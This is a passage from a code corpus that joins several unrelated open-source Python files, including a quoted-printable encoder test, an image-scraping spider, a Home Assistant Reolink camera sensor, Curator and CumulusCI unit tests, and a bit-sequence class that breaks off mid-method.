'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\n' +
'=2Ez'),
# Lines that end with a dot '.' are not quoted
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.zz',
'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.=\n' +
'zz'),
# Lines that lead with a dot '.' should have the dot quoted and cut
# if the quoted line is longer than 76 characters.
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz',
'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\n' +
'=2Ezzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\nzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\n' +
'zz'),
# Respect quoted characters when considering leading '.'
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz' +
b'.\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f',
'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\n' +
'=2E=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=\n' +
'=7F=7F=7F'),
# Should cut somewhere near the middle of the line
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz' +
b'.quick brown fox, quick brown cat, quick hot dog, quick read dog, quick white bird',
'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\n'
'=2Equick brown fox, quick brown cat, qui=\n' +
'ck hot dog, quick read dog, quick whi=\n'
+ 'te bird'),
# Respect quoted character when considering where to cut
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz' +
b'.quick brown fox, quick brown cat\x7f\x7f\x7f\x7f\x7f, quick read dog, quick white bird',
'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\n' +
'=2Equick brown fox, quick brown cat=7F=7F=\n' +
'=7F=7F=7F, quick read dog, quick whi=\n' +
'te bird'),
# Avoid considering non quoted characters when cutting
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz' +
b'.quick brown fox, quick brown cat=20=================, quick read dog, quick white bird',
'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\n' +
'=2Equick brown fox, quick brown cat=3D20=\n' +
'=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=\n' +
'=3D=3D=3D=3D=3D, quick read dog, quick white bird'),
# Should quote leading '.' if the cut results in a '.' on the next line
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz' +
b'.quick brown fox, quick brown cat..................... quick read dog, quick white bird',
'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\n' +
'=2Equick brown fox, quick brown cat.....=\n' +
'=2E............... quick read dog, quic=\n' +
'k white bird'),
# Should quote :space if the cut results in a :space at the end of the next line
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz' +
b'.quick brown fox, quick brown cat quick read dog, quick white bird',
'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\n' +
'=2Equick brown fox, quick brown cat =20=\n' +
' quick read dog, quic=\n' +
'k white bird'),
# Should quote :tab if the cut results in a :tab at the end of the next line
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz' +
b'.quick brown fox, quick brown cat \t quick read dog, quick white bird',
'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\n' +
'=2Equick brown fox, quick brown cat =09=\n' +
' quick read dog, quic=\n' +
'k white bird'),
# Should avoid cutting in the middle of multiple quoted characters near the cut point
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz' +
b'.foo. \xF0\x9F\x99\x82 also there is \xF0\x9F\x99\x82 more in \xF0\x9F\x99\x82 ' +
b'this \xF0\x9F\x99\x82 message</body></html>',
'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\n' +
'=2Efoo. =F0=9F=99=82 also there is =F0=9F=\n' +
'=99=82 more in =F0=9F=99=82 this =F0=\n'
'=9F=99=82 message</body></html>'),
)
def test_encode():
for p, e in STRINGS:
enc = part._encode_transfer_encoding('quoted-printable', p)
eq_(enc, e)
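# Quick manual check (not part of the original test module): the encoder under
# test can also be exercised directly, e.g.
#
#     from flanker.mime.message import part
#     part._encode_transfer_encoding('quoted-printable', b'hello\t')  # -> 'hello=09'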
|
osr2mp4/ImageProcess/PrepareFrames/RankingScreens/RankingReplay.py | siveroo/osr2mp4-core | 103 | 12685734 | from osr2mp4.ImageProcess import imageproc
from osr2mp4.ImageProcess.PrepareFrames.YImage import YImage
rankingreplay = "pause-replay"
def prepare_rankingreplay(scale, settings):
img = YImage(rankingreplay, settings, scale).img
img = imageproc.newalpha(img, 0.4)
return [img]
|
sasila/system_normal/processor/mzitu_proccessor_regex.py | iiiusky/Sasila | 327 | 12685736 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
from sasila.system_normal.spider.spider_core import SpiderCore
from sasila.system_normal.pipeline.pic_pipeline import PicPipeline
from sasila.system_normal.processor.base_processor import BaseProcessor, Rule, LinkExtractor
from sasila.system_normal.downloader.http.spider_request import Request
import os
import uuid
if sys.version_info < (3, 0):
reload(sys)
sys.setdefaultencoding('utf-8')
class MezituProcessor(BaseProcessor):
spider_id = 'mzitu'
spider_name = 'mzitu'
allowed_domains = ['mzitu.com', 'meizitu.net']
start_requests = [Request(url='http://www.mzitu.com/xinggan/')]
rules = (
Rule(LinkExtractor(regex_str=r"http://i.meizitu.net/\d{4}/\d{2}/[0-9a-z]+.jpg"),
callback="save", priority=3),
Rule(LinkExtractor(regex_str=r"http://www.mzitu.com/\d+"), priority=1),
Rule(LinkExtractor(regex_str=r"http://www.mzitu.com/\d+/\d+"), priority=2),
Rule(LinkExtractor(regex_str=r"http://www.mzitu.com/xinggan/page/\d+"), priority=0),
)
def save(self, response):
if response.m_response:
if not os.path.exists("img"):
os.mkdir("img")
with open("img/" + str(uuid.uuid1()) + ".jpg", 'wb') as fs:
fs.write(response.m_response.content)
print("download success!")
# if __name__ == '__main__':
# spider = SpiderCore(MezituProcessor(), batch_size=10).set_pipeline(PicPipeline()).start()
|
hc/lib/tests/test_string.py | karthikprabhu/healthchecks | 4,813 | 12685748 | from django.test import TestCase
from hc.lib.string import replace
class StringTestCase(TestCase):
def test_it_works(self):
result = replace("$A is $B", {"$A": "aaa", "$B": "bbb"})
self.assertEqual(result, "aaa is bbb")
def test_it_ignores_placeholders_in_values(self):
result = replace("$A is $B", {"$A": "$B", "$B": "$A"})
self.assertEqual(result, "$B is $A")
def test_it_ignores_overlapping_placeholders(self):
result = replace("$$AB", {"$A": "", "$B": "text"})
self.assertEqual(result, "$B")
def test_it_preserves_non_placeholder_dollar_signs(self):
result = replace("$3.50", {"$A": "text"})
self.assertEqual(result, "$3.50")
|
yargy/tagger.py | xepozz/yargy | 250 | 12685753 |
class Tagger(object):
tags = []
def __call__(self, tokens):
raise NotImplementedError
def check_tag(self, tag):
return tag in self.tags
class PassTagger(Tagger):
def __call__(self, tokens):
for token in tokens:
yield token
class TaggersComposition(Tagger):
def __init__(self, taggers):
self.taggers = taggers
def __call__(self, tokens):
for tagger in self.taggers:
tokens = tagger(tokens)
return tokens
def check_tag(self, tag):
return any(
_.check_tag(tag)
for _ in self.taggers
)
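if __name__ == '__main__':
    # Minimal sketch, not part of the original module: compose two pass-through
    # taggers; tokens flow through each tagger's generator unchanged.
    composed = TaggersComposition([PassTagger(), PassTagger()])
    print(list(composed(['token-1', 'token-2'])))  # -> ['token-1', 'token-2']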
|
custom_components/reolink_dev/sensor.py | gasecki/Home-Assistant_Config | 163 | 12685762 | """This component provides support for Reolink IP VoD support."""
from urllib.parse import quote_plus
from dataclasses import dataclass
import datetime as dt
import asyncio
import logging
import os
from dateutil import relativedelta
from homeassistant.core import CALLBACK_TYPE, HomeAssistant
import homeassistant.util.dt as dt_utils
from homeassistant.config_entries import ConfigEntry
from homeassistant.components.sensor import DEVICE_CLASS_TIMESTAMP, SensorEntity
from .const import (
BASE,
DOMAIN,
DOMAIN_DATA,
LAST_EVENT,
THUMBNAIL_EXTENSION,
THUMBNAIL_URL,
VOD_URL,
)
from .entity import ReolinkEntity
from .base import ReolinkBase, searchtime_to_datetime
from .typings import VoDEvent, VoDEventThumbnail
_LOGGER = logging.getLogger(__name__)
@asyncio.coroutine
async def async_setup_entry(hass: HomeAssistant, config_entry, async_add_devices):
"""Set up the Reolink IP Camera switches."""
devices = []
base: ReolinkBase = hass.data[DOMAIN][config_entry.entry_id][BASE]
# TODO : add playback (based off of hdd_info) to api capabilities
await base.api.get_switch_capabilities()
if base.api.hdd_info:
devices.append(LastEventSensor(hass, config_entry))
async_add_devices(devices, update_before_add=False)
@dataclass
class _Attrs:
oldest_day: dt.datetime = None
most_recent_day: dt.datetime = None
last_event: VoDEvent = None
class LastEventSensor(ReolinkEntity, SensorEntity):
"""An implementation of a Reolink IP camera sensor."""
def __init__(self, hass: HomeAssistant, config: ConfigEntry):
"""Initialize a Reolink camera."""
ReolinkEntity.__init__(self, hass, config)
SensorEntity.__init__(self)
self._attrs = _Attrs()
self._bus_listener: CALLBACK_TYPE = None
self._entry_id = config.entry_id
async def async_added_to_hass(self) -> None:
"""Entity created."""
await super().async_added_to_hass()
self._bus_listener = self.hass.bus.async_listen(
self._base.event_id, self.handle_event
)
self._hass.async_add_job(self._update_event_range)
async def async_will_remove_from_hass(self):
"""Entity removed"""
if self._bus_listener:
self._bus_listener()
self._bus_listener = None
await super().async_will_remove_from_hass()
async def request_refresh(self):
""" force an update of the sensor """
await super().request_refresh()
self._hass.async_add_job(self._update_event_range)
async def async_update(self):
""" polling update """
await super().async_update()
self._hass.async_add_job(self._update_event_range)
async def _update_event_range(self):
end = dt_utils.now()
start = self._attrs.most_recent_day
if not start:
start = dt.datetime.combine(end.date().replace(day=1), dt.time.min)
if self._base.playback_months > 1:
start -= relativedelta.relativedelta(
months=int(self._base.playback_months)
)
search, _ = await self._base.send_search(start, end, True)
if not search or len(search) < 1:
return
entry = search[0]
self._attrs.oldest_day = dt.datetime(
entry["year"],
entry["mon"],
next((i for (i, e) in enumerate(entry["table"], start=1) if e == "1")),
tzinfo=end.tzinfo,
)
entry = search[-1]
start = self._attrs.most_recent_day = dt.datetime(
entry["year"],
entry["mon"],
len(entry["table"])
- next(
(
i
for (i, e) in enumerate(reversed(entry["table"]), start=0)
if e == "1"
)
),
tzinfo=end.tzinfo,
)
end = dt.datetime.combine(start.date(), dt.time.max, tzinfo=end.tzinfo)
_, files = await self._base.send_search(start, end)
file = files[-1] if files and len(files) > 0 else None
if file is None:
return
filename = file.get("name", "")
if len(filename) == 0:
_LOGGER.info("Search command provided a file record without a name: %s", str(file))
end = searchtime_to_datetime(file["EndTime"], start.tzinfo)
start = searchtime_to_datetime(file["StartTime"], end.tzinfo)
last = self._attrs.last_event = VoDEvent(
str(start.timestamp()),
start,
end - start,
filename,
)
last.url = VOD_URL.format(
camera_id=self._entry_id, event_id=quote_plus(filename)
)
thumbnail = last.thumbnail = VoDEventThumbnail(
THUMBNAIL_URL.format(camera_id=self._entry_id, event_id=last.event_id),
path=os.path.join(
self._base.thumbnail_path, f"{last.event_id}.{THUMBNAIL_EXTENSION}"
),
)
thumbnail.exists = os.path.isfile(thumbnail.path)
data: dict = self._hass.data.setdefault(DOMAIN_DATA, {})
data = data.setdefault(self._base.unique_id, {})
data[LAST_EVENT] = last
self._state = True
self.async_schedule_update_ha_state()
async def handle_event(self, event):
"""Handle incoming event for VoD update"""
if not "motion" in event.data:
return
self._hass.async_add_job(self._update_event_range)
@property
def unique_id(self):
"""Return Unique ID string."""
return f"reolink_lastevent_{self._base.unique_id}"
@property
def name(self):
"""Return the name of this sensor."""
return f"{self._base.name} Last Event"
@property
def device_class(self):
"""Device class of the sensor."""
return DEVICE_CLASS_TIMESTAMP
@property
def state(self):
"""Return the state of the sensor."""
if not self._state:
return None
date = (
self._attrs.last_event.start
if self._attrs.last_event and self._attrs.last_event.start
else None
)
if not date:
return None
return date.isoformat()
@property
def icon(self):
"""Icon of the sensor."""
return "mdi:history"
@property
def extra_state_attributes(self):
"""Return the state attributes."""
attrs = super().extra_state_attributes
if self._state:
if attrs is None:
attrs = {}
if self._attrs.oldest_day:
attrs["oldest_day"] = self._attrs.oldest_day.isoformat()
if self._attrs.last_event:
if self._attrs.last_event.event_id:
attrs["vod_event_id"] = self._attrs.last_event.event_id
if self._attrs.last_event.thumbnail:
attrs["has_thumbnail"] = (
"true"
if self._attrs.last_event.thumbnail.exists
else "false"
)
attrs["thumbnail_path"] = self._attrs.last_event.thumbnail.path
if self._attrs.last_event.duration:
attrs["duration"] = str(self._attrs.last_event.duration)
return attrs
|
test/unit/test_action_restore.py | ssavrim/curator | 2,449 | 12685791 | from unittest import TestCase
from mock import Mock, patch
import elasticsearch
import curator
# Get test variables and constants from a single source
from . import testvars as testvars
class TestActionRestore(TestCase):
def test_init_raise_bad_snapshot_list(self):
self.assertRaises(TypeError, curator.Restore, 'invalid')
def test_init_raise_unsuccessful_snapshot_list(self):
client = Mock()
client.snapshot.get.return_value = testvars.partial
client.snapshot.get_repository.return_value = testvars.test_repo
slo = curator.SnapshotList(client, repository=testvars.repo_name)
self.assertRaises(curator.CuratorException, curator.Restore, slo)
def test_snapshot_derived_name(self):
client = Mock()
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo)
self.assertEqual('snapshot-2015.03.01', ro.name)
def test_provided_name(self):
client = Mock()
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo, name=testvars.snap_name)
self.assertEqual(testvars.snap_name, ro.name)
def test_partial_snap(self):
client = Mock()
client.snapshot.get.return_value = testvars.partial
client.snapshot.get_repository.return_value = testvars.test_repo
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo, partial=True)
self.assertEqual(testvars.snap_name, ro.name)
def test_provided_indices(self):
client = Mock()
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo, indices=testvars.named_indices)
self.assertEqual('snapshot-2015.03.01', ro.name)
def test_extra_settings(self):
client = Mock()
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo, extra_settings={'foo':'bar'})
self.assertEqual(ro.body['foo'], 'bar')
def test_bad_extra_settings(self):
client = Mock()
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo, extra_settings='invalid')
self.assertEqual(ro.body,
{
'ignore_unavailable': False,
'partial': False,
'include_aliases': False,
'rename_replacement': '',
'rename_pattern': '',
'indices': ['index-2015.01.01', 'index-2015.02.01'],
'include_global_state': False
}
)
def test_get_expected_output(self):
client = Mock()
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(
slo, rename_pattern='(.+)', rename_replacement='new_$1')
self.assertEqual(
ro.expected_output,
['new_index-2015.01.01', 'new_index-2015.02.01']
)
def test_do_dry_run(self):
client = Mock()
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo)
self.assertIsNone(ro.do_dry_run())
def test_do_dry_run_with_renames(self):
client = Mock()
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(
slo, rename_pattern='(.+)', rename_replacement='new_$1')
self.assertIsNone(ro.do_dry_run())
def test_report_state_all(self):
client = Mock()
client.info.return_value = {'version': {'number': '5.0.0'} }
client.snapshot.get.return_value = testvars.snapshot
client.snapshot.get_repository.return_value = testvars.test_repo
client.indices.get_settings.return_value = testvars.settings_named
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo)
self.assertIsNone(ro.report_state())
def test_report_state_not_all(self):
client = Mock()
client.info.return_value = {'version': {'number': '5.0.0'} }
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
client.indices.get_settings.return_value = testvars.settings_one
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(
slo, rename_pattern='(.+)', rename_replacement='new_$1')
self.assertRaises(curator.exceptions.FailedRestore, ro.report_state)
def test_do_action_success(self):
client = Mock()
client.info.return_value = {'version': {'number': '5.0.0'} }
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
client.snapshot.status.return_value = testvars.nosnap_running
client.snapshot.verify_repository.return_value = testvars.verified_nodes
client.indices.get_settings.return_value = testvars.settings_named
client.indices.recovery.return_value = testvars.recovery_output
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo, wait_interval=0.5, max_wait=1)
self.assertIsNone(ro.do_action())
def test_do_action_snap_in_progress(self):
client = Mock()
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
client.snapshot.status.return_value = testvars.snap_running
client.snapshot.verify_repository.return_value = testvars.verified_nodes
client.indices.get_settings.return_value = testvars.settings_named
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo)
self.assertRaises(curator.SnapshotInProgress, ro.do_action)
def test_do_action_success_no_wfc(self):
client = Mock()
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
client.snapshot.status.return_value = testvars.nosnap_running
client.snapshot.verify_repository.return_value = testvars.verified_nodes
client.indices.get_settings.return_value = testvars.settings_named
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo, wait_for_completion=False)
self.assertIsNone(ro.do_action())
def test_do_action_report_on_failure(self):
client = Mock()
client.snapshot.get.return_value = testvars.snapshots
client.snapshot.get_repository.return_value = testvars.test_repo
client.snapshot.status.return_value = testvars.nosnap_running
client.snapshot.verify_repository.return_value = testvars.verified_nodes
client.indices.get_settings.return_value = testvars.settings_named
client.snapshot.restore.side_effect = testvars.fake_fail
slo = curator.SnapshotList(client, repository=testvars.repo_name)
ro = curator.Restore(slo)
self.assertRaises(curator.FailedExecution, ro.do_action)
|
cumulusci/tasks/metadata_etl/tests/test_permissions.py | davisagli/CumulusCI | 163 | 12685792 | import pytest
from cumulusci.core.exceptions import TaskOptionsError
from cumulusci.tasks.metadata_etl import AddPermissionSetPermissions
from cumulusci.tasks.salesforce.tests.util import create_task
from cumulusci.utils.xml import metadata_tree
MD = "{%s}" % metadata_tree.METADATA_NAMESPACE
PERMSET_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<PermissionSet xmlns="http://soap.sforce.com/2006/04/metadata">
<applicationVisibilities>
<application>CustomApp</application>
<visible>false</visible>
</applicationVisibilities>
<classAccesses>
<apexClass>ApexController</apexClass>
<enabled>false</enabled>
</classAccesses>
<fieldPermissions>
<editable>false</editable>
<field>Test__c.Lookup__c</field>
<readable>false</readable>
</fieldPermissions>
<hasActivationRequired>false</hasActivationRequired>
<label>Test</label>
<objectPermissions>
<allowCreate>false</allowCreate>
<allowDelete>false</allowDelete>
<allowEdit>false</allowEdit>
<allowRead>false</allowRead>
<modifyAllRecords>false</modifyAllRecords>
<object>Test__c</object>
<viewAllRecords>false</viewAllRecords>
</objectPermissions>
<recordTypeVisibilities>
<recordType>Case.Test</recordType>
<visible>true</visible>
</recordTypeVisibilities>
<tabSettings>
<tab>standard-report</tab>
<visibility>Visible</visibility>
</tabSettings>
<userPermissions>
<enabled>true</enabled>
<name>ActivitiesAccess</name>
</userPermissions>
</PermissionSet>
"""
class TestAddPermissionSetPermissions:
def test_adds_new_field_permission(self):
task = create_task(
AddPermissionSetPermissions,
{
"managed": True,
"api_version": "47.0",
"api_names": "bar,foo",
"field_permissions": [
{
"field": "Test__c.Description__c",
"readable": True,
"editable": True,
}
],
},
)
tree = metadata_tree.fromstring(PERMSET_XML)
element = tree._element
assert (
len(
element.findall(
f".//{MD}fieldPermissions[{MD}field='Test__c.Description__c']"
)
)
== 0
)
task._transform_entity(tree, "PermSet")
fieldPermissions = element.findall(
f".//{MD}fieldPermissions[{MD}field='Test__c.Description__c']"
)
assert len(fieldPermissions) == 1
readable = fieldPermissions[0].findall(f".//{MD}readable")
assert len(readable) == 1
assert readable[0].text == "true"
editable = fieldPermissions[0].findall(f".//{MD}editable")
assert len(editable) == 1
assert editable[0].text == "true"
def test_updates_existing_field_permission(self):
task = create_task(
AddPermissionSetPermissions,
{
"managed": True,
"api_version": "47.0",
"api_names": "bar,foo",
"field_permissions": [
{"field": "Test__c.Lookup__c", "readable": True, "editable": True}
],
},
)
tree = metadata_tree.fromstring(PERMSET_XML)
element = tree._element
assert (
len(
element.findall(
f".//{MD}fieldPermissions[{MD}field='Test__c.Lookup__c']"
)
)
== 1
)
        task._transform_entity(tree, "PermSet")
fieldPermissions = element.findall(
f".//{MD}fieldPermissions[{MD}field='Test__c.Lookup__c']"
)
assert len(fieldPermissions) == 1
readable = fieldPermissions[0].findall(f".//{MD}readable")
assert len(readable) == 1
assert readable[0].text == "true"
editable = fieldPermissions[0].findall(f".//{MD}editable")
assert len(editable) == 1
assert editable[0].text == "true"
def test_adds_new_class_permission(self):
task = create_task(
AddPermissionSetPermissions,
{
"managed": True,
"api_version": "47.0",
"api_names": "bar,foo",
"class_accesses": [{"apexClass": "LWCController", "enabled": True}],
},
)
tree = metadata_tree.fromstring(PERMSET_XML)
element = tree._element
assert (
len(element.findall(f".//{MD}classAccesses[{MD}apexClass='LWCController']"))
== 0
)
task._transform_entity(tree, "PermSet")
classAccesses = element.findall(
f".//{MD}classAccesses[{MD}apexClass='LWCController']"
)
assert len(classAccesses) == 1
enabled = classAccesses[0].findall(f".//{MD}enabled")
assert len(enabled) == 1
assert enabled[0].text == "true"
def test_upserts_existing_class_permission(self):
task = create_task(
AddPermissionSetPermissions,
{
"managed": True,
"api_version": "47.0",
"api_names": "bar,foo",
"class_accesses": [{"apexClass": "ApexController", "enabled": True}],
},
)
tree = metadata_tree.fromstring(PERMSET_XML)
element = tree._element
assert (
len(
element.findall(f".//{MD}classAccesses[{MD}apexClass='ApexController']")
)
== 1
)
        task._transform_entity(tree, "PermSet")
classAccesses = element.findall(
f".//{MD}classAccesses[{MD}apexClass='ApexController']"
)
assert len(classAccesses) == 1
enabled = classAccesses[0].findall(f".//{MD}enabled")
assert len(enabled) == 1
assert enabled[0].text == "true"
def test_missing_apexclass_throws_exception(self):
task = create_task(
AddPermissionSetPermissions,
{
"managed": True,
"api_version": "47.0",
"api_names": "bar,foo",
"class_accesses": [{"enabled": True}],
},
)
tree = metadata_tree.fromstring(PERMSET_XML)
with pytest.raises(TaskOptionsError):
task._transform_entity(tree, "PermSet")
def test_missing_field_throws_exception(self):
task = create_task(
AddPermissionSetPermissions,
{
"managed": True,
"api_version": "47.0",
"api_names": "bar,foo",
"field_permissions": [{"readable": True}],
},
)
tree = metadata_tree.fromstring(PERMSET_XML)
with pytest.raises(TaskOptionsError):
task._transform_entity(tree, "PermSet")
|
software/glasgow/support/bits.py | tmbinc/glasgow | 1,014 | 12685794 | import re
import operator
from functools import reduce
import collections.abc
__all__ = ["bits"]
class bits:
"""An immutable bit sequence, like ``bytes`` but for bits.
This bit sequence is ordered from LSB to MSB; this is the direction in which it is converted
to and from iterators, and to and from bytes. Note, however, that it is converted to and from
    strings (which should only be used where a human-readable form is required) from MSB to LSB;
this matches the way integer literals are written, as well as values in datasheets and other
documentation.
"""
__slots__ = ["_len_", "_int_"]
@classmethod
def from_int(cls, value, length=None):
value = operator.index(value)
if length is None:
if value < 0:
raise ValueError("invalid negative input for bits(): '{}'".format(value))
length = value.bit_length()
else:
length = operator.index(length)
value &= ~(-1 << length)
inst = object.__new__(cls)
inst._len_ = length
inst._int_ = value
return inst
@classmethod
def from_str(cls, value):
value = re.sub(r"[\s_]", "", value)
if value:
if value[0] == "-":
raise ValueError("invalid negative input for bits(): '{}'".format(value))
elif value[0] == "+":
length = len(value) - 1
else:
length = len(value)
return cls.from_int(int(value, 2), length)
else:
return cls.from_int(0)
@classmethod
def from_iter(cls, iterator):
length = -1
value = 0
for length, bit in enumerate(iterator):
value |= bool(bit) << length
return cls.from_int(value, length + 1)
@classmethod
def from_bytes(cls, value, length):
return cls.from_int(int.from_bytes(value, "little"), length)
def __new__(cls, value=0, length=None):
if isinstance(value, cls):
if length is None:
return value
else:
return cls.from_int(value._int_, length)
if isinstance(value, int):
return cls.from_int(value, length)
if isinstance(value, str):
if length is not None:
raise ValueError("invalid input for bits(): when converting from str "
"length must not be provided")
return cls.from_str(value)
if isinstance(value, (bytes, bytearray, memoryview)):
if length is None:
raise ValueError("invalid input for bits(): when converting from bytes "
"length must be provided")
return cls.from_bytes(value, length)
if isinstance(value, collections.abc.Iterable):
if length is not None:
raise ValueError("invalid input for bits(): when converting from an iterable "
"length must not be provided")
return cls.from_iter(value)
raise TypeError("invalid input for bits(): cannot convert from {}"
.format(value.__class__.__name__))
def __len__(self):
return self._len_
def __bool__(self):
return bool(self._len_)
def to_int(self):
return self._int_
__int__ = to_int
def to_str(self):
if self._len_:
return format(self._int_, "0{}b".format(self._len_))
return ""
__str__ = to_str
def to_bytes(self):
return self._int_.to_bytes((self._len_ + 7) // 8, "little")
__bytes__ = to_bytes
def __repr__(self):
return "bits('{}')".format(self)
def __getitem__(self, key):
if isinstance(key, int):
if key < 0:
return (self._int_ >> (self._len_ + key)) & 1
else:
return (self._int_ >> key) & 1
if isinstance(key, slice):
start, stop, step = key.indices(self._len_)
assert step == 1
if stop < start:
return self.__class__()
else:
return self.__class__(self._int_ >> start, stop - start)
raise TypeError("bits indices must be integers or slices, not {}"
.format(key.__class__.__name__))
def __iter__(self):
for bit in range(self._len_):
yield (self._int_ >> bit) & 1
def __eq__(self, other):
try:
other = self.__class__(other)
except TypeError:
return False
return self._len_ == other._len_ and self._int_ == other._int_
def __add__(self, other):
other = self.__class__(other)
return self.__class__(self._int_ | (other._int_ << self._len_),
self._len_ + other._len_)
def __radd__(self, other):
other = self.__class__(other)
return other + self
def __mul__(self, other):
if isinstance(other, int):
return self.__class__(reduce(lambda a, b: (a << self._len_) | b,
(self._int_ for _ in range(other)), 0),
self._len_ * other)
return NotImplemented
def __rmul__(self, other):
return self * other
def __and__(self, other):
other = self.__class__(other)
return self.__class__(self._int_ & other._int_, max(self._len_, other._len_))
def __rand__(self, other):
other = self.__class__(other)
return self & other
def __or__(self, other):
other = self.__class__(other)
return self.__class__(self._int_ | other._int_, max(self._len_, other._len_))
def __ror__(self, other):
other = self.__class__(other)
return self | other
def __xor__(self, other):
other = self.__class__(other)
return self.__class__(self._int_ ^ other._int_, max(self._len_, other._len_))
def __rxor__(self, other):
other = self.__class__(other)
return self ^ other
def reversed(self):
value = 0
for bit in range(self._len_):
value <<= 1
if (self._int_ >> bit) & 1:
value |= 1
return self.__class__(value, self._len_)
def find(self, sub, start=0, end=-1):
sub = self.__class__(sub)
        # Negative offsets count back from the end; end=-1 (the default) searches through the last bit.
        if start < 0:
            start = self._len_ + start
        if end < 0:
            end = self._len_ + end + 1
